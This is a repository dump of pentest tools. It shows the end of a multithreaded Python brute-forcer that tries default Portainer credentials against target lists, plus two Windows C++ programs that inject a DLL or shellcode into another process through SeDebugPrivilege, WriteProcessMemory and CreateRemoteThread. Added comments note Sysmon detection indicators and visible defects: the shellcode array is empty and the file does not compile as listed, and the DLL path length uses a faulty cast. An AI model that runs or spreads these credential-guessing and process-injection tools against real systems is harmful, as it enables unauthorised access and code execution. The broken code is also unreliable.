str(error))) 61 | return False 62 | if detail == "Unauthorized": 63 | print("[-] Wrong [%s] [Username:%s, Password:%s]" % (target_url, username, password)) 64 | elif detail == "Access denied to resource": 65 | print("[-] Deny [%s] " % (target_url)) 66 | elif detail == "Administrator initialization timeout": 67 | print("[-] Error [%s] [Application 
Server Administrator Initialization Timeout]" % target_url) 68 | else: 69 | print(raw_text) 70 | else: 71 | print("[-] Unknown [%s] [Unknown Status Code: %s]" % (target_url, code)) 72 | return False 73 | 74 | 75 | 76 | class PortainerScanner: 77 | def __init__(self, target_ip: str, target_file=None, username_file=None, password_file=None): 78 | self.target_list = [target_ip] if target_ip is not None else [] 79 | if target_file is not None: 80 | self.target_list.extend(read_file_to_list(target_file)) 81 | self.size = len(self.target_list) 82 | self.username_list: list = read_file_to_list(username_file) if username_file is not None else ["admin", "portainer"] 83 | self.password_list: list = read_file_to_list(password_file) if password_file is not None else ["portainer", "12345678"] 84 | 85 | def scan(self): 86 | for target in self.target_list: 87 | for username in self.username_list: 88 | for password in self.password_list: 89 | thread = threading.Thread(target=portainer_weak_password_verify, args=[target, username, password]) 90 | thread.start() 91 | 92 | 93 | if __name__ == "__main__": 94 | if len(sys.argv) < 4: 95 | print("[*] Usage: Python PortainerWeakPasswordScanner.py target|targetfile usernamefile passwordfile") 96 | exit(0) 97 | target_file = sys.argv[1] 98 | target_parameter = target_file if target_file.startswith("http") else None 99 | target_file = None if target_parameter is not None else target_file 100 | username_file = sys.argv[2] 101 | password_file = sys.argv[3] 102 | scanner = PortainerScanner(target_parameter, target_file, username_file, password_file) 103 | scanner.scan() 104 | -------------------------------------------------------------------------------- /PentestCode/ProcessDLLInjection.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "stdlib.h" 6 | #pragma comment(lib,"ws2_32.lib") 7 | #pragma comment (lib,"Advapi32.lib") 8 | #pragma comment 
(lib,"Iphlpapi.lib") 9 | #pragma comment(lib, "Psapi.lib") 10 | #pragma comment(lib, "user32.lib") 11 | #pragma comment(lib, "userenv.lib") 12 | 13 | using namespace std; 14 |

// ProcessDLLInjection.cpp entry point.
//
// Usage as written: argv[1] = target process id, argv[2] = path of a DLL.
// Steps performed, in order:
//   1. enable SeDebugPrivilege on this process's token,
//   2. open the target process with PROCESS_ALL_ACCESS,
//   3. allocate memory in the target and copy the DLL path string into it,
//   4. start a thread in the target at LoadLibraryA with that string as argument.
//
// Defender view: each of steps 2-4 is a cross-process operation that endpoint
// telemetry records, e.g. Sysmon Event ID 10 (ProcessAccess) for the
// PROCESS_ALL_ACCESS open and Event ID 8 (CreateRemoteThread) for step 4.
// A remote thread whose start address is LoadLibraryA is a long-standing
// indicator. Limiting which accounts hold the "Debug programs" user right
// removes step 1 for those accounts.
//
// NOTE(review): argc is never checked, so argv[1] / argv[2] are read even when
// they were not supplied. The angle-bracket header names on the #include lines
// of this file are missing from the page.
int main(int argc, char* argv[]) {
    DWORD ProcessID = atoi(argv[1]);
    cout << ProcessID << endl;
    HANDLE CurrentToken;
    LUID SeDebugNameValue;
    TOKEN_PRIVILEGES TokenProvoleges;

    // Open our own token with the rights needed to query and adjust privileges.
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &CurrentToken)){
        cout << "We Need Administrator Priveileges!" << endl;
        return 0;
    }

    // Resolve the LUID that identifies SeDebugPrivilege on this system.
    if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &SeDebugNameValue)) {
        CloseHandle(CurrentToken);
        cout << "We Need Administrator Priveileges!" << endl;
        return 0;
    }

    // Single-entry privilege set: SeDebugPrivilege, enabled.
    TokenProvoleges.PrivilegeCount = 1;
    TokenProvoleges.Privileges[0].Luid = SeDebugNameValue;
    TokenProvoleges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    if (!AdjustTokenPrivileges(CurrentToken, FALSE, &TokenProvoleges, sizeof TokenProvoleges, NULL, NULL)) {
        CloseHandle(CurrentToken);
        cout << "We Need Administrator Priveileges!" << endl;
        return 0;
    }

    CloseHandle(CurrentToken);

    // Full-access handle to the target; handle inheritance is off (FALSE).
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessID);
    if (hProcess == 0) {
        cout << "[-] Open Process Failed! Got System Error Code: " << GetLastError() << endl;
        CloseHandle(hProcess);
        return 0;
    }
    char* DLLFileName = argv[2];
    // Byte count for the remote buffer: lstrlen of the path pointer, plus one.
    DWORD Size = 1 + lstrlen((LPCWSTR)DLLFileName);
    LPVOID DLLAddr = NULL;
    // Read/write (not executable) region in the target that will hold the path string.
    DLLAddr = VirtualAllocEx(hProcess, NULL, Size, MEM_COMMIT, PAGE_READWRITE);
    if (DLLAddr == NULL) {
        cout << "[-] Memory Alloc Failed! Got System Error Code: " << GetLastError() << endl;
        CloseHandle(hProcess);
        return 0;
    }
    if (!WriteProcessMemory(hProcess, DLLAddr, DLLFileName, Size, NULL)) {
        cout << "[-] Write Process Memory Failed! Got System Error Code: " << GetLastError() << endl;
        CloseHandle(hProcess);
        return 0;
    }

    // kernel32 is looked up in THIS process; the address found below is then
    // used unchanged as the thread start routine in the target.
    HMODULE hModule = GetModuleHandle(_T("kernel32.dll"));

    cout << hModule << ":-:" << GetLastError() << endl;

    FARPROC pFuncProcAddr = GetProcAddress(hModule, (LPCSTR)"LoadLibraryA");
    if (pFuncProcAddr == NULL) {
        cout << "[-] Get Process Address Failed! Got System Error Code: " << GetLastError() << endl;
        CloseHandle(hProcess);
        return 0;
    }

    // Thread in the target: start routine = LoadLibraryA, parameter = remote path buffer.
    HANDLE RemoteThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pFuncProcAddr, DLLAddr, 0, NULL);
    if (RemoteThread == NULL) {
        cout << "[-] Create Remote Thread Failed! Got System Error Code: " << GetLastError() << endl;
        CloseHandle(hProcess);
        return 0;
    }
    cout << "[+] Process Injection Succeed!" << endl;
    return 0;
}

-------------------------------------------------------------------------------- /PentestCode/ProcessShellcodeInjection.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "stdlib.h" 6 | #pragma comment(lib,"ws2_32.lib") 7 | #pragma comment (lib,"Advapi32.lib") 8 | #pragma comment (lib,"Iphlpapi.lib") 9 | #pragma comment(lib, "Psapi.lib") 10 | #pragma comment(lib, "user32.lib") 11 | #pragma comment(lib, "userenv.lib") 12 | 13 | using namespace std; 14 |

// The byte array is empty on this page; the length in the comment below refers
// to content that is not included in the listing.
// NOTE(review): as listed, the declaration has no terminating ';' and main()
// further down has no closing brace, so this file does not compile as shown.
/* length: 795 bytes */
unsigned char buf[] = {}
// ProcessShellcodeInjection.cpp entry point.
//
// Usage as written: argv[1] = target process id (argc is not checked).
// Same SeDebugPrivilege and PROCESS_ALL_ACCESS steps as the DLL variant in
// ProcessDLLInjection.cpp. The difference is that the contents of `buf` are
// copied into the target and the remote thread's start address is the copied
// buffer itself rather than an exported function.
//
// Defender view: in addition to the ProcessAccess and CreateRemoteThread
// telemetry, a thread whose start address lies in private memory not backed
// by any loaded image is a common memory-scanning indicator.
int main(int argc, char* argv[]) {
    DWORD ProcessID = atoi(argv[1]);
    HANDLE CurrentToken;
    LUID SeDebugNameValue;
    TOKEN_PRIVILEGES TokenProvoleges;

    // Open our own token with the rights needed to query and adjust privileges.
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &CurrentToken)) {
        cout << "We Need Administrator Priveileges!" << endl;
        return 0;
    }

    // Resolve the LUID that identifies SeDebugPrivilege on this system.
    if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &SeDebugNameValue)) {
        CloseHandle(CurrentToken);
        cout << "We Need Administrator Priveileges!" << endl;
        return 0;
    }

    // Single-entry privilege set: SeDebugPrivilege, enabled.
    TokenProvoleges.PrivilegeCount = 1;
    TokenProvoleges.Privileges[0].Luid = SeDebugNameValue;
    TokenProvoleges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    if (!AdjustTokenPrivileges(CurrentToken, FALSE, &TokenProvoleges, sizeof TokenProvoleges, NULL, NULL)) {
        CloseHandle(CurrentToken);
        cout << "We Need Administrator Priveileges!" << endl;
        return 0;
    }

    CloseHandle(CurrentToken);

    // Full-access handle to the target; handle inheritance is off (FALSE).
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessID);
    if (hProcess == 0) {
        cout << "[-] Open Process Failed! Got System Error Code: " << GetLastError() << endl;
        CloseHandle(hProcess);
        return 0;
    }
    // Size of the local array, which is also the size of the remote allocation.
    DWORD Size = sizeof(buf);
    // Region in the target, requested with PAGE_READWRITE protection.
    LPVOID RemoteBuffer = VirtualAllocEx(hProcess, NULL, Size, MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE);
    if (RemoteBuffer == NULL) {
        cout << "[-] Memory Alloc Failed! Got System Error Code: " << GetLastError() << endl;
        CloseHandle(hProcess);
        return 0;
    }
    ;
    if (!WriteProcessMemory(hProcess, RemoteBuffer, buf, Size, NULL)) {
        cout << "[-] Write Process Memory Failed! Got System Error Code: " << GetLastError() << endl;
        CloseHandle(hProcess);
        return 0;
    }
    // Thread in the target: start routine = the remote buffer, no parameter.
    HANDLE RemoteThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)RemoteBuffer, NULL, 0, NULL);
    if (RemoteThread == NULL) {
        cout << "[-] Create Remote Thread Failed! Got System Error Code: " << GetLastError() << endl;
        CloseHandle(hProcess);
        return 0;
    }
    cout << "[+] Process Injection Succeed!" << endl;
    CloseHandle(hProcess);
    return 0;

-------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # 安全工具 2 | 日常积累的小工具 3 | --------------------------------------------------------------------------------